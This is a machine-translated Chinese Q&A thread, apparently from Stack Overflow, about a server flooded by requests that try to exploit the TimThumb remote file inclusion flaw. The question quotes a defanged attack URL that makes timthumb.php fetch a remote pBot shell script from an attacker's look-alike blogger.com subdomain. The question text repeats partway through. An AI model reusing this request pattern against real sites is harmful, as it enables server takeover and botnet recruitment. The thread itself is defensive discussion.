Security 是否通过另一台服务器包含远程文件?
我的服务器(mediaquarter.at)目前正被这样的请求DDoS攻击(有一些小的变化):hXXp://www.mediaquarter.at/http://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php (URL“已停用”,因此没有人会意外单击它) 如果您试图下载引用的PHP文件,请小心:在preg_replace中,有一个/e开关被激活,代码包含多个eval语句-在您想要查看它之前,请先清理它!看起来像pBot,您可以在此处找到有关它的更多信息: TimThumb易受远程文件包含的攻击(http://eromang.zataz.com/2011/09/20/wordpress-timthumb-rfi-vulnerability-used-as-botnet-recruitment-vector/)-在WordPress中似乎非常普遍。所以我理解有人打电话给hXXp://www.madeineurope.org.uk/media/functions/timtumb/timtumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php 利用该漏洞 然而,试图通过另一个网站(mediaquarter.at)调用它有什么意义,它只会导致404错误消息?另外,我的服务器没有运行WordPress,而是SilverStripe,所以这似乎毫无意义 <>这是攻击者的一个错误/愚蠢还是我忽略了某种攻击向量?< /P>Security 是否通过另一台服务器包含远程文件?,security,wordpress,ddos,remote-file-inclusion,Security,Wordpress,Ddos,Remote File Inclusion,我的服务器(mediaquarter.at)目前正被这样的请求DDoS攻击(有一些小的变化):hXXp://www.mediaquarter.at/http://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php (URL“已停用”,因此没有人会意外单击它) 如果您试图下载引用的PHP文件,请小心:在preg_re
PS:服务器只是一些廉价的web主机,我根本无法访问它,因此我无法验证系统是否有任何更改。如果您没有timtumb.php文件,那么您就不容易受到攻击。这是一个我已经深入研究过的非常奇特的漏洞,因为(到目前为止)它是一种。你应该读报纸上的文章 简言之,它缓存来自youtube.com和blogger.com等“受信任”网站的图像。但是,这个正则表达式编写得很糟糕,并且没有绑定到字符串的末尾。更改子域来愚弄这个正则表达式检查是很简单的。这就是为什么攻击者的域名是blogger.com.midislandrental.com
您受到DDoS攻击的原因可能是timthumb.php的抓取没有返回404,或者通过timthumb.php传播的大规模僵尸网络错误地将您识别为易受攻击。你可能会出现在google dork中,让机器人试图找到易受攻击的主机 serverfault不是问这个问题的好地方吗?我主要感兴趣的是,为什么您会通过另一个不受漏洞影响的主机调用RFI。所以我认为这更适合于编程部分而不是系统管理部分…哇,你已经完整地回答了你自己的问题。你为什么发帖?我的主要问题是通过另一个主机的RFI-对我来说这听起来毫无意义/似乎不起作用。但是我不确定这是否真的是真的,或者我是否忽略了什么-所以我在问那些聪明的人:-)这类问题是个好地方。我确实得到了关于假图像和子域技巧的部分。然而,我没有想到机器人部分——谢谢你指出这一点!所以我怀疑某个脚本小子写了一个蹩脚的脚本来利用WordPress漏洞。它没有尝试加载URL,而是将我的(不易受攻击的)URL与潜在目标连接起来,并反复尝试-导致DDoS…@xeraa这样的机器人网络是有组织犯罪的产物。有些人喜欢露营地,并大量利用系统牟利。还有,很抱歉发了这样一篇文章。